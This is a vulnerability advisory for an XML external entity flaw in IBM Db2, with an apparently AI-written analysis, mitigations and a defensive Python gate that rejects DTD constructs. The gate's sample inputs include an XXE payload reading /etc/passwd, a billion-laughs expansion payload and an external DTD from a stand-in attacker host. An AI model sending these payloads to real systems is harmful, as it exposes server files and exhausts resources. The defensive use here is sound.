
CVE-2025-36247: CWE-611 Improper Restriction of XML External Entity Reference in IBM Db2 for Linux, UNIX and Windows

Severity: High
Tags: Vulnerability, CVE-2025-36247, CVE, CWE-611
Published: Tue Feb 17 2026 (02/17/2026, 17:13:06 UTC)
Source: CVE Database V5
Vendor/Project: IBM
Product: Db2 for Linux, UNIX and Windows

Description

IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 11.5.0 through 11.5.9 and 12.1.0 through 12.1.3 is vulnerable to an XML external entity injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources.

AI-Powered Analysis

Last updated: 02/18/2026, 08:21:12 UTC

Technical Analysis

CVE-2025-36247 is an XML External Entity (XXE) injection vulnerability, classified as CWE-611, in IBM Db2 for Linux, UNIX and Windows, including Db2 Connect Server, affecting versions 11.5.0 through 11.5.9 and 12.1.0 through 12.1.3. The XML parser inside the database server does not sufficiently restrict external entity references when it processes XML supplied by a client. IBM's description does not name the affected component; Db2 parses client-supplied XML in several places (values stored in XML columns, pureXML functions such as XMLPARSE and XMLVALIDATE), so until IBM's bulletin narrows it, any path by which a connected user can hand the server a complete XML document should be treated as in scope.

The CVSS v3.1 base score of 7.1 reflects a network-reachable, low-complexity attack by an authenticated low-privilege user (PR:L) with no user interaction (UI:N), high confidentiality impact, no integrity impact and low availability impact. PR:L is the key qualifier for risk assessment: "remote" means over a Db2 client connection, so the attacker needs valid database credentials, or an application that forwards untrusted XML into Db2 under its own credentials, in which case an unauthenticated user of that application effectively reaches the parser. A malicious document with an entity such as SYSTEM "file:///..." causes the server to read the referenced file with the privileges of the Db2 instance owner (typically db2inst1 on Linux), so anything that account can read, including Db2 configuration and any key or credential material on disk, is exposed; an entity pointing at a URL can also be used to push data out of band if the host has egress. The "consume memory resources" half of the description matches entity-expansion attacks of the billion-laughs type, and the Low availability rating indicates degradation of the instance rather than a guaranteed outage.

No public exploit had been reported when this analysis was written, but the flaw is publicly disclosed and the technique is well understood, so it should be treated as a significant risk. This analysis recorded no fix available at disclosure; IBM's security bulletin for CVE-2025-36247 is the authoritative source for fix-pack or special-build availability. Because Db2 commonly holds an enterprise's most sensitive records, the confidentiality impact is the dominant concern.

Potential Impact

For European organizations the impact is greatest in finance, telecommunications, government and critical infrastructure, where Db2 commonly holds regulated data. A successful read of server-side files could expose personal data, intellectual property or credentials stored on the database host, with GDPR notification and reporting consequences, and the entity-expansion path could degrade or interrupt the database instance, disrupting operations that depend on it. The exposure is bounded by the PR:L requirement: an attacker needs a valid Db2 login, or an application that forwards untrusted XML into the database under its own credentials. This is therefore not a mass-scannable, unauthenticated flaw, but it is a serious escalation for anyone who already holds or has captured a database account, and internet-facing applications that accept XML and store it in Db2 XML columns should be treated as a direct path for outside attackers. Systems that share data with an affected instance inherit the confidentiality risk, and a confirmed exposure of regulated data would draw regulatory scrutiny.

Mitigation Recommendations

1. Track IBM's security bulletin for CVE-2025-36247 and apply the fix pack or special build for your 11.5 or 12.1 release as soon as it is available. Upgrading is the only complete remediation; the measures below reduce exposure until then.
2. Reject client-supplied XML that contains a DOCTYPE declaration before it is sent to Db2. Both external-entity reads and entity-expansion memory attacks require a DTD, so refusing <!DOCTYPE at the application boundary (in the code that binds XML values for INSERT, UPDATE or XMLPARSE, or in the API in front of it) closes both paths without changing the database. Use a parser that fails on DTD constructs rather than a regular expression, which encoding tricks can bypass.
3. The public advisory does not document a Db2 registry variable or database configuration parameter that disables external entity resolution; do not assume such a setting exists unless IBM's bulletin names it.
4. Apply network controls with their limits in mind: Db2 clients speak DRDA over TCP (port 50000 by default), not HTTP, so a WAF protects only the web applications in front of the database. An IPS rule for <!DOCTYPE or <!ENTITY in traffic to the Db2 port can catch unencrypted attempts but sees nothing once SSL/TLS is enabled on the listener.
5. Restrict access to the Db2 listener to application servers and administrative hosts, and never expose it to the internet. With PR:L, every account that can connect is a potential attacker, so also prune unused database accounts and rotate application credentials that may have leaked.
6. Limit what a successful XXE can reach: the parser runs as the instance owner (for example db2inst1 on Linux), so keep keystores, backup images and other applications' secrets unreadable to that account, and apply egress filtering on the database host so an external entity URL cannot be used to exfiltrate data out of band.
7. Monitor for exploitation: audit statement text and input values for <!DOCTYPE and <!ENTITY (the Db2 audit facility's EXECUTE category, configured WITH DATA, captures both), and alert on unexplained instance memory growth reported in db2diag.log or by db2pd.
8. Deploy database activity monitoring (DAM) to flag XML inserts from accounts or hosts that do not normally submit XML, and unusual query patterns following such inserts.
9. Review every application that writes XML into Db2 and harden its own XML handling; an XXE-safe application is the most reliable shield for a server that is not yet patched.
10. Update incident response runbooks for XXE: enumerate which files the instance owner can read, and treat every secret in that set as potentially exposed if exploitation is confirmed.
11. Brief database administrators and security teams on the vulnerability and on these measures.
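The following is an added example, not code from IBM's advisory or from the Db2 product, showing the application-boundary gate that recommendation 2 describes for the XXE and entity-expansion paths discussed in the technical analysis. It uses only Python's standard-library expat parser and rejects any document that declares a DOCTYPE, an entity, or an external reference before the document would be bound as a Db2 XML value. The sample documents, the function names and the file path used in the XXE sample are constructed for illustration and are not taken from the advisory.

```python
"""Gate XML before it reaches Db2: refuse DTD constructs that enable XXE.

Added example; not IBM or Db2 code. Standard library only.
The sample documents below are constructed for illustration.
"""
import xml.parsers.expat


class UnsafeXml(ValueError):
    """Raised when a document declares a DTD, an entity, or an external reference."""


def check_xml_for_db2(doc: bytes) -> None:
    """Parse `doc` with expat and raise UnsafeXml on the first DTD construct.

    Classic XXE (SYSTEM entities pointing at files or URLs) and entity-expansion
    memory attacks ("billion laughs") both need a DOCTYPE, so refusing the
    DOCTYPE itself closes both paths. Malformed XML is rejected as well; Db2
    would reject it anyway, and failing closed keeps the gate simple.
    """
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Fires on "<!DOCTYPE ..." whether the DTD is inline or external.
        raise UnsafeXml(f"DOCTYPE {name!r} declared (system id {system_id!r})")

    def on_entity(name, is_param, value, base, system_id, public_id, notation):
        # Defence in depth: reached only if a DOCTYPE somehow slipped past.
        kind = "parameter" if is_param else "general"
        raise UnsafeXml(f"{kind} entity {name!r} declared (system id {system_id!r})")

    def on_external_ref(context, base, system_id, public_id):
        raise UnsafeXml(f"external entity reference to {system_id!r}")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.ExternalEntityRefHandler = on_external_ref
    try:
        parser.Parse(doc, True)
    except xml.parsers.expat.ExpatError as exc:
        raise UnsafeXml(f"not well-formed XML: {exc}") from exc


def is_safe_for_db2(doc: bytes) -> bool:
    """Boolean form of the gate, for use at the point where the value is bound."""
    try:
        check_xml_for_db2(doc)
    except UnsafeXml:
        return False
    return True


def classify(doc: bytes) -> str:
    """Return 'ok' or the rejection reason, which is what you want in the audit log."""
    try:
        check_xml_for_db2(doc)
    except UnsafeXml as exc:
        return str(exc)
    return "ok"


# Constructed sample inputs (not from the advisory).
BENIGN = (b'<?xml version="1.0"?>'
          b'<order id="42"><item sku="A-1" qty="3"/>Tom &amp; Jerry</order>')

# Textbook XXE: the server would resolve a local file into the parsed document.
XXE_FILE = (b'<?xml version="1.0"?>'
            b'<!DOCTYPE d [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
            b'<order><note>&xxe;</note></order>')

# Entity expansion ("billion laughs") aimed at memory exhaustion.
LAUGHS = (b'<?xml version="1.0"?><!DOCTYPE lolz ['
          b'<!ENTITY lol "lol">'
          b'<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">'
          b'<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">'
          b']><order>&lol3;</order>')

# External DTD: the DOCTYPE alone is enough to reject, before anything is fetched.
EXT_DTD = (b'<?xml version="1.0"?>'
           b'<!DOCTYPE order SYSTEM "http://attacker.example/evil.dtd"><order/>')

if __name__ == "__main__":
    for label, doc in [("benign", BENIGN), ("xxe_file", XXE_FILE),
                       ("laughs", LAUGHS), ("ext_dtd", EXT_DTD)]:
        print(f"{label:9s} -> {classify(doc)}")
```

Call check_xml_for_db2 in the code path that binds the XML parameter (for example a prepared INSERT with a ? marker for an XML column) and fail closed on UnsafeXml, logging the reason rather than the document. The gate deliberately refuses well-formed documents that merely carry a DOCTYPE, which is the right trade-off for application data; it does nothing for XML that Db2 generates or retrieves itself, which is why the fix pack remains the actual remediation.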


Technical Details

Data Version: 5.2
Assigner Short Name: ibm
Date Reserved: 2025-04-15T21:16:43.936Z
CVSS Version: 3.1
State: PUBLISHED

Threat ID: 699575bb80d747be20537709
Added to database: 2/18/2026, 8:18:03 AM
Last enriched: 2/18/2026, 8:21:12 AM
Last updated: 2/21/2026, 12:21:31 AM

